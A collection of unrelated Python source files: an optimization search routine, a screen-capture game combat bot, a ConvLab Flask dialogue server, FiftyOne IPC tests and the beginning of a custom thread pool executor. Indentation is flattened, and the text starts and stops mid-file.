resArray = onebit_rev(linear,k)
result_label.append([res,resArray])
# print(res)
q.put(result_label)
def calcMultiProc3(func, cand, i, N, upperx, lowerx,linear):
listN = [j for j in range(N)]
newNs = getDistedList(listN, nProc)
processes = []; queues = []
for n in range(nProc):
newN = newNs[n]
q = Queue()
p = Process(target=procJob3, args=(func, cand, i, newN, upperx, lowerx,linear, q))
processes.append(p)
queues.append(q)
p.start()
result_label = []
for n in range(nProc):
processes[n].join()
result = queues[n].get()
result_label += result
return [result_label, listN]
def neib_serach(func,Candidates,i,N,upperx,lowerx):
result_label = []
for cand in Candidates:
print(cand.idnum)
scoreup_param = 0
linear = move_mode(cand.prev_move1,cand.prev_move2).copy()
tryindx = cand.indx + linear
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
result_label.append([res,linear])
# print(linear)
# print(tryindx)
# print(tryx)
# print(res)
[result_label, kList] = calcMultiProc3(func, cand, i, N, upperx, lowerx,linear)
for n in range(len(result_label)):
if result_label[n][0] < res:
k = kList[n]
linear[k] = onebit_rev(cand.prev_move1,k)[k]
scoreup_param = scoreup_param + 1
#for k in range (0,N):
# tryindx = cand.indx + onebit_rev(move_mode(cand.prev_move1,cand.prev_move2),k)
# # print(onebit_rev(cand.prev_move1,k))
# print(tryindx)
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# result_label.append([res,onebit_rev(move_mode(cand.prev_move1,cand.prev_move2),k)])
# print(res)
# if res < result_label[0][0]:
# linear[k] = onebit_rev(cand.prev_move1,k)[k]
# scoreup_param = scoreup_param + 1
# print(linear)
if (scoreup_param > 1):
tryindx = cand.indx + linear
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
result_label.append([res,linear])
print(linear)
print(tryindx)
print(tryx)
print(res)
result_label.sort(key=itemgetter(0))
cand.indx = cand.indx + linear
cand.value = res
cand.prev_move2 = cand.prev_move1
cand.depth = i + 1
cand.prev_move1 = linear
else:
result_label.sort(key=itemgetter(0))
cand.indx = cand.indx + result_label[0][1]
cand.value = result_label[0][0]
cand.prev_move2 = cand.prev_move1
cand.depth = i + 1
cand.prev_move1 = result_label[0][1]
if (cand.maxvalue > result_label[0][0]):
cand.maxindx = cand.indx
                cand.maxvalue = cand.value
result_label.clear()
def procJob4(func, cand, i, newN, upperx, lowerx,linear,q):
result_label = []
for k in newN:
tryindx = 2*cand.indx + onebit_rev(linear,k)
print(tryindx)
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
resArray = onebit_rev(linear,k)
result_label.append([res,resArray])
print(res)
q.put(result_label)
def calcMultiProc4(func, cand, i, N, upperx, lowerx,linear):
listN = [j for j in range(N)]
newNs = getDistedList(listN, nProc)
processes = []; queues = []
for n in range(nProc):
newN = newNs[n]
q = Queue()
p = Process(target=procJob4, args=(func, cand, i, newN, upperx, lowerx,linear, q))
processes.append(p)
queues.append(q)
p.start()
result_label = []
for n in range(nProc):
processes[n].join()
result = queues[n].get()
result_label += result
return [result_label, listN]
def neib_serach_acl(func,Candidates,i,N,upperx,lowerx):
result_label = []
for cand in Candidates:
print(cand.idnum)
scoreup_param = 0
linear = move_mode(cand.prev_move1,cand.prev_move2).copy()
cand.depth = 2*cand.depth
tryindx = 2*cand.indx + linear
tryx = np.vectorize(convertLists)(tryindx,cand.depth,lowerx,upperx)
res = func(tryx)
result_label.append([res,linear])
print(linear)
print(cand.depth)
print(tryindx)
print(tryx)
print(res)
[result_label, kList] = calcMultiProc4(func, cand, cand.depth, N, upperx, lowerx,linear)
for n in range(len(result_label)):
if result_label[n][0] < res:
k = kList[n]
linear[k] = onebit_rev(linear,k)[k]
scoreup_param = scoreup_param + 1
# for k in range (0,N):
# tryindx = 2*cand.indx + onebit_rev(move_mode(cand.prev_move1,cand.prev_move2),k)
# print(onebit_rev(cand.prev_move1,k))
# print(tryindx)
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# result_label.append([res,onebit_rev(move_mode(cand.prev_move1,cand.prev_move2),k)])
# print(res)
# if res < result_label[0][0]:
# linear[k] = onebit_rev(move_mode(cand.prev_move1,cand.prev_move2),k)[k]
# scoreup_param = scoreup_param + 1
# print(linear)
if (scoreup_param > 1):
# tryindx = 2*cand.indx + linear
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# result_label.append([res,linear])
print(linear)
print(tryindx)
print(tryx)
print(res)
result_label.sort(key=itemgetter(0))
cand.indx = 2*cand.indx + linear
cand.value = res
# cand.depth = i + 1
cand.prev_move2 = cand.prev_move1
cand.prev_move1 = linear
else:
result_label.sort(key=itemgetter(0))
cand.indx = 2*cand.indx + result_label[0][1]
cand.value = result_label[0][0]
# cand.depth = i + 1
cand.prev_move2 = cand.prev_move1
cand.prev_move1 = result_label[0][1]
result_label.clear()
# if ( scoreup_param > 1):
# tryindx = 2*cand.indx + linear
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# result_label.append([res,linear])
# print(linear)
# print(tryindx)
# print(tryx)
# print(res)
# result_label.sort(key=itemgetter(0))
# cand.indx = 2*cand.indx + result_label[0][1]
# cand.value = result_label[0][0]
# cand.prev_move2 = cand.prev_move1
# cand.prev_move1 = result_label[0][1]
# result_label.clear()
def pascal(func,upperx,lowerx,depth=20,linearmode_start=11,pattern="all",Cands=1):
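    """Entry point of the search.
    upperx/lowerx give the per-dimension bounds, depth is the number of refinement iterations,
    linearmode_start is the iteration at which the search switches from comb_search to neib_serach,
    pattern points to a file of binary move patterns (its value is also compared against "all" inside comb_search),
    and Cands is the number of candidate solutions tracked.
    Returns a list of [value, index vector, coordinate vector] entries, one per candidate.
    """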
global max_value
global max_position
N=len(upperx)
if (N == 0 or N != len(lowerx)):
print ("upper or lower is wrong.")
sys.exit(1)
if os.path.exists(pattern):
try:
f=open(pattern)
except:
print("Pattern file is not exist.")
exit()
x = f.read()
f.close()
lines = [i for i in re.split(r'\n',x) if i != '']
length = len(lines)
lines_cut = []
lines_merge = []
lines_numpy = []
        for c_list in lines:  # each pattern string in the list
c_list=c_list[0:N]
lines_cut.append(c_list)
print(c_list)
lines_merge = list(set(lines_cut))
print(lines_merge)
lines_merge.sort()
for c_list in lines_merge:
c_list=list(c_list)
c_list=[int(s) for s in c_list]
num_list=np.array(c_list)
lines_numpy.append(num_list)
    else:
        print("Pattern file not found:", pattern)
        sys.exit(1)
Candidates = []
origin =Candidate(idnum=0,indx=np.zeros(N, dtype = int),prev_move1=np.zeros(N, dtype = int),value=0.,prev_move2=np.zeros(N, dtype = int),depth=0,maxindx=np.zeros(N, dtype = int),maxvalue=0.)
Candidates.append(origin)
    for i in range(1,depth+1):  # number of search iterations
print ('start')
if (i<linearmode_start):
comb_search(func,Candidates,i,lines_numpy,N,upperx,lowerx,Cands,pattern)
else:
neib_serach(func,Candidates,i,N,upperx,lowerx)
result = []
for cand in Candidates:
max_value.append(cand.value)
max_position.append(np.vectorize(convertLists)(cand.indx,cand.depth,lowerx,upperx))
result.append([cand.value,cand.indx,np.vectorize(convertLists)(cand.indx,cand.depth,lowerx,upperx)])
return result
# return cand.value,np.vectorize(convertLists)(cand.indx,cand.depth,lowerx,upperx)
|
combat_standalone.py
|
# The intent of this test is to verify that a standalone combat bot works
# And then incorporate the working standalone back into the v3 test bot
from hsvfilter import grab_object_preset
from windowcapture import WindowCapture
from vision import Vision
import os
import combo
import threading
import time
import pydirectinput
import math
import cv2 as cv
os.chdir(os.path.dirname(os.path.abspath(__file__)))
class StandaloneCombat():
# Weapon arg options are 2 letter for weapon and then either
# F or U for focused or unfocused
def __init__(self, controller, weapon="MSU", level=1) -> None:
self.controller = controller
# self.nearest_enemy_dist = 1
self.dist_threshold = 125
self.centre_mass_angle = 90
# self.ongoing_combo_count = False
# self.frames_since_combo_detect = 1000
self.dunchk_momentum = 10
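        # Grace counter used by combat_mainloop to tolerate a few missed dungeon/enemy detections before handing control back to movement mode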
self.target_relative_coords = [0, 0]
self.current_player_coords = [0, 0]
self.other_player_rel_coords = [0, 0]
self.enemy_locs = []
self.running = False
self.setup()
# This will decide which class to use
self.weapon = weapon
# This will assign correct skills for level
self.level = level
# This will hold the cooldown times for each skill
self.cooldowns = {"popthis": 1}
# This will track when a key can be next pressed
self.cd_tracker = {"popthis": 1}
# This will be the class to use
self.combos = None
        # This will hold the current keypress queue
self.combo_queue = []
# This method fills out each of the above vars
self.initialise_wep_class()
def setup(self):
# Grab the gamename from the text file
with open("gamename.txt") as f:
gamename = f.readline()
# The next block of code is setup for detecting the section cleared msg
self.sect_clear_filter, sect_clear_custom_rect = grab_object_preset(
object_name="message_section_cleared")
# initialize the WindowCapture class for sect_clear detection
self.sect_clear_wincap = WindowCapture(
gamename, sect_clear_custom_rect)
# initialize the Vision class
self.sect_clear_vision = Vision('SectionCleared67.jpg')
# The next block of code is setup for detecting the combo count
self.combo_count_filter, combo_count_custom_rect = grab_object_preset(
object_name="combo_count")
# initialize the WindowCapture class for combo_count detection
self.combo_count_wincap = WindowCapture(
gamename, combo_count_custom_rect)
# initialize the Vision class
self.combo_count_vision = Vision('combocount67.jpg')
# The next block of code is setup for detecting the current player
self.player_filter, player_custom_rect = grab_object_preset(
object_name="player_map_loc")
# initialize the WindowCapture class for player detection
self.player_wincap = WindowCapture(
gamename, player_custom_rect)
self.player_vision = Vision('playerv2_67.jpg')
# The next block of code is setup for detecting enemies on minimap
        # This uses the same image as the player minimap but duplicates it to prevent errors
self.enemy_minimap_filter, enemy_custom_rect = grab_object_preset(
object_name="enemy_map_locv3")
self.enemy_minimap_wincap = WindowCapture(
gamename, enemy_custom_rect)
# initialize the Vision class
self.enemy_minimap_vision = Vision('enemy67.jpg')
# The next block of code is setup for detecting if in a dungeon
self.dunchk_filter, dunchk_custom_rect = grab_object_preset(
object_name="dungeon_check")
self.dunchk_wincap = WindowCapture(
gamename, dunchk_custom_rect)
self.dunchk_vision = Vision('dunchk_67.jpg')
# The next block of code is setup for detecting the other player
self.othr_plyr_filter, othr_plyr_custom_rect = grab_object_preset(
object_name="other_player_map_loc")
self.othr_plyr_wincap = WindowCapture(
gamename, othr_plyr_custom_rect)
self.othr_plyr_vision = Vision('otherplayer67.jpg')
def combat_mainloop(self):
loop_time = time.time()
time.sleep(0.1)
# Need to start the combo
self.start_combo_handler()
while True:
if self.check_if_in_dungeon():
if self.check_for_sect_clear():
self.controller.mode = "movement"
self.controller.combat_cooldown = time.time() + 5
break
if self.dunchk_momentum < 20:
self.dunchk_momentum += 1
if self.check_for_ongoing_combo():
pass
elif self.check_for_enemies():
self.calc_nearest_enemy()
elif self.dunchk_momentum >= 1:
self.dunchk_momentum -= 1
else:
self.controller.mode = "movement"
break
# If loops are over 100fps, slow to 67fps
if 100*(time.time() - loop_time) < 1:
# Minimum sleep time is roughly 15ms regardless
time.sleep(0.001)
loop_time = time.time()
self.running = False
def check_if_in_dungeon(self):
# get an updated image of the game at specified area
dunchk_screenshot = self.dunchk_wincap.get_screenshot()
# pre-process the image to help with detection
dunchk_output_image = self.dunchk_vision.apply_hsv_filter(
dunchk_screenshot, self.dunchk_filter)
# do object detection, this time grab rectangles
dunchk_rectangles = self.dunchk_vision.find(
dunchk_output_image, threshold=0.31, epsilon=0.5)
# then return answer to whether currently in dungeon
if len(dunchk_rectangles) == 1:
return True
return False
def check_for_enemies(self):
minimap_screenshot = self.enemy_minimap_wincap.get_screenshot()
# pre-process the image to help with detection
enemy_output_image = self.enemy_minimap_vision.apply_hsv_filter(
minimap_screenshot, self.enemy_minimap_filter)
# do object detection, this time grab points
enemy_rectangles = self.enemy_minimap_vision.find(
enemy_output_image, threshold=0.61, epsilon=0.5)
# then return answer to whether enemies are detected
if len(enemy_rectangles) >= 1:
# Need to first update the current player location
self.can_find_current_player()
points = self.enemy_minimap_vision.get_click_points(
enemy_rectangles)
# Then translate the points to be relative to the player
points = self.get_relative_to_player(points)
self.enemy_locs = points.copy()
return True
return False
def check_for_sect_clear(self):
# then try to detect the sect_clear
sc_ss = self.sect_clear_wincap.get_screenshot()
# pre-process the image to help with detection
sect_clear_image = self.sect_clear_vision.apply_hsv_filter(
sc_ss, self.sect_clear_filter)
# do object detection, this time grab rectangles
sect_clear_rectangles = self.sect_clear_vision.find(
sect_clear_image, threshold=0.34, epsilon=0.5)
# then return answer to whether sect clear is showing
if len(sect_clear_rectangles) == 1:
return True
return False
def check_for_ongoing_combo(self):
# then try to detect the combo_count
oc_ss = self.combo_count_wincap.get_screenshot()
# pre-process the image to help with detection
combo_count_image = self.combo_count_vision.apply_hsv_filter(
oc_ss, self.combo_count_filter)
# do object detection, this time grab rectangles
combo_count_rectangles = self.combo_count_vision.find(
combo_count_image, threshold=0.21, epsilon=0.5)
# then return answer to whether currently in dungeon
if len(combo_count_rectangles) >= 1:
return True
return False
    def calc_nearest_enemy(self):
        # Track the nearest enemy across the whole list (closest is reset once per call, not per enemy)
        closest = 1000
        nearestx, nearesty = self.target_relative_coords
        for x, y in self.enemy_locs:
            if x + y < closest:
                closest = x + y
                nearestx = x
                nearesty = y
        self.centre_mass_angle = self.calc_angle(
            nearestx, nearesty)
        # Then set the "target" enemy
        self.target_relative_coords = [nearestx, nearesty]
def calc_angle(self, relx, rely):
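        # Convert the atan2 angle (degrees, 0 = +x axis, counter-clockwise) into a 0-360 bearing where 0/360 is up and values increase clockwise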
angle = math.degrees(math.atan2(rely, relx))
if angle <= 90:
angle = angle * -1 + 90
else:
angle = 360 + (angle-90) * -1
return angle
def can_find_current_player(self):
# Main logic for this method is below
minimap_screenshot = self.player_wincap.get_screenshot()
player_image = self.player_vision.apply_hsv_filter(
minimap_screenshot, self.player_filter)
player_rectangles = self.player_vision.find(
player_image, threshold=0.41, epsilon=0.5)
player_points = self.player_vision.get_click_points(
player_rectangles)
if len(player_points) == 1:
self.current_player_coords[0] = player_points[0][0]
self.current_player_coords[1] = player_points[0][1]
return True
else:
# Should this be set to 0,0 or left as is? Come back to this later
# Will leave as is for now, probably useful for enemy detect
return False
def get_relative_to_player(self, abs_list):
# This will convert the points in a list
# To be relative to the player
playerx = self.current_player_coords[0]
playery = self.current_player_coords[1]
returnlist = []
for x, y in abs_list:
relx = x - playerx
rely = playery - y
returnlist.append([relx, rely])
return returnlist
def point_at_target(self):
if self.centre_mass_angle >= 315 or self.centre_mass_angle < 45:
pydirectinput.keyDown("up")
if self.centre_mass_angle >= 225 and self.centre_mass_angle < 315:
pydirectinput.keyDown("left")
if self.centre_mass_angle >= 135 and self.centre_mass_angle < 225:
pydirectinput.keyDown("down")
if self.centre_mass_angle >= 45 and self.centre_mass_angle < 135:
pydirectinput.keyDown("right")
def start_combo_handler(self):
t = threading.Thread(target=self.combo_handler_MS)
t.start()
def combo_handler(self):
if not self.running:
self.running = True
while self.running:
if len(self.combo_queue) > 0:
key, duration = self.combo_queue[0]
nextkey = None
if len(self.combo_queue) > 1:
nextkey, _ = self.combo_queue[1]
if nextkey == "point":
# Need to point at centre mass of enemies or nearest in range enemy
self.point_at_target()
if key is None:
time.sleep(duration)
elif key == "move":
# Need to calculate time to press buttons in function
# And then press the required buttons
self.move_towards_target()
else:
pydirectinput.keyDown(key)
time.sleep(duration)
pydirectinput.keyUp(key)
time.sleep(0.07)
if nextkey == "point":
for key in ["up", "down", "left", "right"]:
pydirectinput.keyUp(key)
if len(self.combo_queue) > 0:
self.combo_queue.pop(0)
else:
print("Error, tried to pop when array was size 0")
else:
self.combo_queue = self.combos.grab_preferred_combo().copy()
else:
self.combo_queue = []
for key in ["up", "down", "left", "right"]:
pydirectinput.keyUp(key)
def combo_handler_MS(self):
if not self.running:
self.running = True
while self.running:
if len(self.combo_queue) > 0:
key, duration = self.combo_queue[0]
nextkey = None
if len(self.combo_queue) > 1:
nextkey, _ = self.combo_queue[1]
if nextkey == "point":
# Need to point at centre mass of enemies or nearest in range enemy
self.point_at_target()
if key is None:
time.sleep(duration)
elif key == "move":
# Need to calculate time to press buttons in function
# And then press the required buttons
self.move_towards_target()
elif key == "moveplayer":
# Check if can find other player, then move towards
# But only for a specific duration
if self.can_find_other_player():
self.move_towards_other_player(duration)
elif key == "point":
pass
elif key == "x":
pydirectinput.keyDown(key)
time.sleep(duration)
pydirectinput.keyUp(key)
time.sleep(0.07)
elif key in self.cooldowns:
if time.time() > self.cd_tracker[key]:
self.cd_tracker[key] = time.time() + \
self.cooldowns[key]
pydirectinput.keyDown(key)
time.sleep(duration)
pydirectinput.keyUp(key)
time.sleep(0.07)
else:
# Grab the cooldowns of all available keys
# Check if any are ready yet, if yes then go next loop
if self.can_create_preferred_available_order():
pass
                        # If it isn't, move towards the other player if detected
# And keep doing that until the next cooldown is up
elif self.can_find_other_player():
self.move_towards_other_player()
# Or else move opposite direction to enemies but stay in range
else:
self.move_towards_safety()
if nextkey == "point":
for key in ["up", "down", "left", "right"]:
pydirectinput.keyUp(key)
else:
self.combo_queue = self.combos.grab_preferred_combo().copy()
else:
self.combo_queue = []
self.remove_all_keypresses()
def can_create_preferred_available_order(self):
# This will check the current available keys
# And if any are not on cooldown i.e. available to use
# Will create a new order for the combo queue
# Based on the preferred combo order
available = []
for key, cd_time in self.cd_tracker.items():
            if time.time() > cd_time:
available.append(key)
if len(available) == 0:
return False
else:
self.add_keys_to_queue(available, True)
return True
def add_keys_to_queue(self, available, overwrite=False):
prioritised = []
# First need to sort the keys in order of priority
for key in self.combos.grab_preferred_order():
if key in available:
prioritised.append(key)
# Overwrite if necessary
if overwrite:
self.combo_queue = []
# Then add to combo queue
for key in prioritised:
self.combo_queue.append([key, 0.15])
    def move_towards_other_player(self, duration=None):
        # This will move the current character towards the other player
        # Usually while waiting for cooldowns
        # duration is accepted because combo_handler_MS passes one, but the
        # move itself currently runs until the target (or a timeout) is reached
        # Then do the movement towards other player
        self.move_towards_target(self.other_player_rel_coords)
# If has taken more than enough time then all fine
# Otherwise it will loop again and probably end up
# back here again, not sure if this is an issue or not
def move_towards_safety(self):
# This will attempt to stay within range of average enemy position
# But move away from them to hopefully dodge attacks
# First grab the coords and get opposite
movex = self.target_relative_coords[0]
movey = self.target_relative_coords[1]
abx = abs(movex)
aby = abs(movey)
# Then figure out how far to move to stay within range
ratio = (abx + aby)/self.dist_threshold
# Check if already too far away from target then move closer
if ratio < 1:
# If within range then move back to max range
self.move_towards_target(
[int((-movex/(abx+aby))*self.dist_threshold), int(-movey/(abx+aby)*self.dist_threshold)])
else:
# Move halfway towards the nearest enemy
self.move_towards_target([int(movex/2), int(movey/2)])
def add_move_next_action(self):
# Only grab the first i.e. current action and remove the rest
self.combo_queue = self.combo_queue[:1]
# And then append the instruction to move afterwards
self.combo_queue.append(["move", 2])
def remove_all_keypresses(self):
for key in ["up", "down", "left", "right"]:
pydirectinput.keyUp(key)
for key in ["a", "s", "d", "f", "g", "h"]:
pydirectinput.keyUp(key)
def move_towards_target(self, coords=False):
# Default pixels/sec test move rate was 50pixels in 2.5sec minimap
# Which is 20pixels/sec
if coords:
xdist_to_move = coords[0]
ydist_to_move = coords[1]
else:
xdist_to_move = self.target_relative_coords[0]
ydist_to_move = self.target_relative_coords[1]
if xdist_to_move > 0:
pydirectinput.keyDown("right")
elif xdist_to_move < 0:
pydirectinput.keyDown("left")
if ydist_to_move > 0:
pydirectinput.keyDown("up")
elif ydist_to_move < 0:
pydirectinput.keyDown("down")
# Now hold the buttons until moved to target location
xdist_to_move = abs(xdist_to_move)
ydist_to_move = abs(ydist_to_move)
counter = 0
while self.running:
time.sleep(0.1)
counter += 1
x_remain = xdist_to_move - 2*counter
y_remain = ydist_to_move - 2*counter
if x_remain <= 0:
pydirectinput.keyUp("right")
pydirectinput.keyUp("left")
if y_remain <= 0:
pydirectinput.keyUp("up")
pydirectinput.keyUp("down")
if x_remain <= 0 and y_remain <= 0:
# Releasing keys to catch any bugs or errors here
pydirectinput.keyUp("right")
pydirectinput.keyUp("left")
pydirectinput.keyUp("up")
pydirectinput.keyUp("down")
break
if counter >= 80:
pydirectinput.keyUp("right")
pydirectinput.keyUp("left")
pydirectinput.keyUp("up")
pydirectinput.keyUp("down")
break
def initialise_wep_class(self):
# First create the classes with required information
if self.weapon == "MSU":
self.combos = combo.MSUnfocused(level=self.level)
elif self.weapon == "MSF":
self.combos = combo.MSFocused(level=self.level)
elif self.weapon == "WBU":
self.combos = combo.WeaponBagUnfocused(level=self.level)
elif self.weapon == "WBF":
self.combos = combo.WeaponBagFocused(level=self.level)
# Second figure out which keys to track cooldowns for
for key, value in self.combos.grab_base_cooldowns().items():
if value:
self.cooldowns[key] = value
self.cd_tracker[key] = time.time()
self.cooldowns.pop("popthis")
self.cd_tracker.pop("popthis")
def can_find_other_player(self):
# then try to detect the other player
minimap_screenshot = self.othr_plyr_wincap.get_screenshot()
output_image = self.othr_plyr_vision.apply_hsv_filter(
minimap_screenshot, self.othr_plyr_filter)
# do object detection, this time grab the points
rectangles = self.othr_plyr_vision.find(
output_image, threshold=0.41, epsilon=0.5)
points = self.othr_plyr_vision.get_click_points(rectangles)
if len(points) == 1:
self.other_player_rel_coords[0] = points[0][0] - \
self.current_player_coords[0]
self.other_player_rel_coords[1] = self.current_player_coords[1] - points[0][1]
return True
elif len(points) >= 2:
# Will grab the point closest to the centre of the minimap and track that
# Allowing some small amount of redundancy for short-range following
# In event that the background is also picked up
middle_x = 0
middle_y = 0
dist = 1000
for x, y in points:
if (x+y) < dist:
dist = x+y
middle_x = x
middle_y = y
self.other_player_rel_coords[0] = middle_x - \
self.current_player_coords[0]
self.other_player_rel_coords[1] = self.current_player_coords[1] - middle_y
return True
else:
# Should this be set to 0,0 or left as is? Come back to this later
# Maybe set it to the current player coords instead
# self.other_player_rel_coords = [0, 0]
return False
if __name__ == "__main__":
cs = StandaloneCombat(controller=None)
time.sleep(2)
cs.combat_mainloop()
|
cambot_server.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import pickle
import time
from queue import PriorityQueue
from threading import Thread
import tensorflow as tf
from convlab.modules.dst.multiwoz.mdbt import MDBTTracker, init_state
from convlab.modules.word_policy.multiwoz.mdrg.predict import loadModel, predict
from flask import Flask, request, jsonify
import convlab
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
_config = tf.ConfigProto()
_config.gpu_options.allow_growth = True
_config.allow_soft_placement = True
start_time = time.time()
rgi_queue = PriorityQueue(maxsize=0)
rgo_queue = PriorityQueue(maxsize=0)
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def process():
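    # Hand the request to the background generator thread via rgi_queue, block until it has been processed (join), then read the reply from rgo_queue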
    try:
        in_request = request.json
    except Exception:
        # request.json failed, so report the raw body instead of an unbound name
        return "invalid input: {}".format(request.data)
rgi_queue.put(in_request)
rgi_queue.join()
output = rgo_queue.get()
rgo_queue.task_done()
return jsonify(output)
def generate_response(in_queue, out_queue):
# Response generator
response_model = loadModel(15)
# state tracker
sess = tf.Session(config=_config)
mdbt = MDBTTracker()
saver = tf.train.Saver()
print('\tMDBT: model build time: {:.2f} seconds'.format(time.time() - start_time))
mdbt.restore_model(sess, saver)
prefix = os.path.dirname(convlab.__file__)
dic = pickle.load(open(prefix + '/../data/nrg/mdrg/svdic.pkl', 'rb'))
while True:
# pop input
in_request = in_queue.get()
history = in_request['history']
prev_state = in_request['prev_state']
prev_active_domain = in_request['prev_active_domain']
if prev_state is None:
prev_state = init_state()
state = init_state()
state['history'] = history
try:
mdbt.state = state
state = mdbt.update(sess, "")
except Exception as e:
print('State update error', e)
prev_state = init_state()
prev_active_domain = None
state = init_state()
history = [['null', 'hello']]
state['history'] = history
try:
response, active_domain = predict(response_model, prev_state, prev_active_domain, state, dic)
except Exception as e:
print('Response generation error', e)
response = 'What did you say?'
active_domain = 'null'
# print(response)
out_queue.put({'response': response, 'active_domain': active_domain, 'state': state})
in_queue.task_done()
out_queue.join()
if __name__ == '__main__':
worker = Thread(target=generate_response, args=(rgi_queue, rgo_queue,))
    worker.daemon = True
worker.start()
app.run(host='0.0.0.0', port=10002)
|
ipc_tests.py
|
"""
Tests related to inter-process communication (for services).
| Copyright 2017-2021, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import contextlib
import pickle
import random
import socket
import sys
import threading
import time
import psutil
import pytest
import retrying
from fiftyone.service.ipc import IPCServer, send_request
from fiftyone.service.util import (
find_processes_by_args,
get_listening_tcp_ports,
normalize_wrapper_process,
send_ipc_message,
)
current_process = psutil.Process()
def list_current_ports():
return list(get_listening_tcp_ports(current_process))
@contextlib.contextmanager
def SingleRequestHandler(server):
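    """Handle a single request on a background thread, stopping the server when the context exits."""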
t = threading.Thread(target=server.handle_request)
t.start()
try:
yield
finally:
server.stop()
t.join()
@contextlib.contextmanager
def MultiRequestHandler(server):
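    """Serve requests on a background thread until the context exits, then stop the server."""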
t = threading.Thread(target=server.serve_forever)
t.start()
try:
yield
finally:
server.stop()
t.join()
def test_one_request():
with IPCServer(lambda x: x * 2) as server, SingleRequestHandler(server):
assert send_request(server.port, 5) == 10
def test_multiple_requests():
with IPCServer(lambda x: x * 2) as server, MultiRequestHandler(server):
assert send_request(server.port, 5) == 10
assert send_request(server.port, "a") == "aa"
def test_bad_request():
with IPCServer(lambda _: None) as server, SingleRequestHandler(server):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", server.port))
s.send(b"foo")
res = pickle.loads(s.recv(2048))
assert isinstance(res, pickle.UnpicklingError)
def test_large_request():
with IPCServer(lambda x: x) as server, SingleRequestHandler(server):
data = list(range(10000))
assert send_request(server.port, data) == data
def test_timeout():
with IPCServer(lambda _: None) as server:
server.timeout = 1
timeout_called = threading.Event()
server.handle_timeout = timeout_called.set
with SingleRequestHandler(server):
time.sleep(server.timeout + 0.5)
assert timeout_called.is_set()
def test_stop_single():
requests = []
with IPCServer(requests.append) as server, SingleRequestHandler(server):
server.timeout = 1
server.stop()
with pytest.raises(socket.error):
send_request(server.port, 5)
assert not requests
def test_stop_multi():
requests = []
with IPCServer(requests.append) as server, MultiRequestHandler(server):
send_request(server.port, 1)
assert requests == [1]
server.stop()
with pytest.raises(socket.error):
send_request(server.port, 2)
assert requests == [1]
def test_run_in_background():
requests = []
with IPCServer.run_in_background(requests.append) as server:
send_request(server.port, 2)
send_request(server.port, 3)
assert requests == [2, 3]
def test_find_processes_by_args():
assert current_process in list(
find_processes_by_args(current_process.cmdline())
)
random_arg = str(5 + random.random())
p = psutil.Popen(
[
sys.executable,
"-c",
"import sys, time; time.sleep(float(sys.argv[1]))",
random_arg,
]
)
@retrying.retry(stop_max_delay=2000)
def _check():
assert normalize_wrapper_process(p) in list(
find_processes_by_args([random_arg])
)
try:
_check()
finally:
p.kill()
def test_get_listening_tcp_ports():
assert not list_current_ports()
with IPCServer(lambda _: None) as server:
assert list_current_ports() == [server.port]
assert not list_current_ports()
def test_send_ipc_message():
with IPCServer.run_in_background(lambda x: x) as server:
assert send_ipc_message(current_process, 6) == 6
with pytest.raises(IOError):
send_ipc_message(current_process, 7)
|
custom_threadpool_executor.py
|
"""
史上最强的python线程池。
最智能的可自动实时调节线程数量的线程池。此线程池和官方concurrent.futures的线程池 是鸭子类关系,所以可以一键替换类名 或者 import as来替换类名。
对比官方线程池,有4个创新功能或改进。
1、主要是不仅能扩大,还可自动缩小(官方内置的ThreadpoolExecutor不具备此功能,此概念是什么意思和目的,可以百度java ThreadpoolExecutor的KeepAliveTime参数的介绍),
例如实例化一个1000线程的线程池,上一分钟疯狂高频率的对线程池submit任务,线程池会扩张到最大线程数量火力全开运行,
但之后的七八个小时平均每分钟只submit一两个任务,官方线程池会一直维持在1000线程,而此线程池会自动缩小,靠什么来识别预测可以自动缩小呢,就是KeepAliveTime。
2、非常节制的开启多线程,例如实例化一个最大100线程数目的pool,每隔2秒submit一个函数任务,而函数每次只需要1秒就能完成,实际上只需要调节增加到1个线程就可以,不需要慢慢增加到100个线程
官方的线程池不够智能,会一直增加到最大线程数目,此线程池则不会。
3、线程池任务的queue队列,修改为有界队列
4、此线程池运行函数出错时候,直接显示线程错误,官方的线程池则不会显示错误,例如函数中写1/0,任然不现实错误。
此实现了submit,还实现future相关的内容,真正的和内置的ThreadpoolExecutor 完全替代。
"""
import os
import atexit
import queue
import sys
import threading
import time
import weakref
from nb_log import LoggerMixin, nb_print, LoggerLevelSetterMixin, LogManager
from concurrent.futures import Executor, Future
from function_scheduling_distributed_framework.concurrent_pool.custom_evenlet_pool_executor import check_evenlet_monkey_patch
from function_scheduling_distributed_framework.concurrent_pool.custom_gevent_pool_executor import check_gevent_monkey_patch
_shutdown = False
_threads_queues = weakref.WeakKeyDictionary()
def check_not_monkey():
if check_gevent_monkey_patch(raise_exc=False):
        raise Exception('Do not apply the gevent monkey patch')
if check_evenlet_monkey_patch(raise_exc=False):
        raise Exception('Do not apply the eventlet monkey patch')
def _python_exit():
global _shutdown
_shutdown = True
items = list(_threads_queues.items())
for t, q in items:
q.put(None)
for t, q in items:
t.join()
atexit.register(_python_exit)
class _WorkItem(LoggerMixin):
def __init__(self, future, fn, args, kwargs):
self.future = future
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
# noinspection PyBroadException
if not self.future.set_running_or_notify_cancel():
return
try:
result = self.fn(*self.args, **self.kwargs)
except BaseException as exc:
            self.logger.exception(f'Error in function {self.fn.__name__}; reason: {type(exc)} {exc} ')
self.future.set_exception(exc)
# Break a reference cycle with the exception 'exc'
self = None # noqa
else:
self.future.set_result(result)
def __str__(self):
return f'{(self.fn.__name__, self.args, self.kwargs)}'
def set_threadpool_executor_shrinkable(min_works=1, keep_alive_time=10):
